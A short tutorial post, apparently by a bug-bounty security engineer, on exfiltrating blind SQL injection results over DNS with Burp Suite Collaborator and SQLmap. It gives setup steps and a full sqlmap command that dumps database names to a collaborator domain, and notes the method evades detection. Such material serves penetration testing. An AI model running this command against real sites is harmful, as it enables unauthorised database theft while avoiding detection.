DNS for faster exfiltration of blind SQL injection data (Burp suite and SQLmap only).
--
Data extraction via blind SQL injection is extremely slow, this is due to the “sleep” queries that check whether a query returned true or false. To eliminate this problem, an SQL injection data extraction technique through DNS has been improved and has become a tool to assist this process. Furthermore, this technique avoids detection since the data is encoded in hexadecimal and sent through the DNS.
- Prerequisites:
- Burp Suite professional edition (https://portswigger.net/burp/pro)
- SQLmap (https://sqlmap.org)
2. Tool installation.
Open Burp Suite, go to “extender” tab, next click on “BAPP Store”, scroll down until you find the extension “SQLmap DNS collaborator”, select it and click on install.
3. Tool setup.
Open “extender” tab, click on “extensions”, select the recently downloaded extension and then click on “output”, finally, copy the Burp Suite special collaborator link.
4. Tool usage.
Paste the special Burp Suite collaborator link in SQLmap argument “--dns-domain
”, see the example below:
python sqlmap.py -u "httsp://site.com/notice.php?id=1" --dns-domain=rvqvtmob9f778j1ql4gg4c7t5abazz.burpcollaborator.net --dbs
If all goes well, you should see a message similar to this one marked in red in the image below:
I’m David Botelho Mariano, I participate as a Security Engineer in bug bounty of “https://hackerone.com”, for professional contact send me an email: “contato.davidmariano@gmail.com”.
Bibliography reference:
https://github.com/portswigger/sqlmap-dns-collaborator
https://pentest.blog/data-ex-filtration-with-dns-in-sqli-attacks/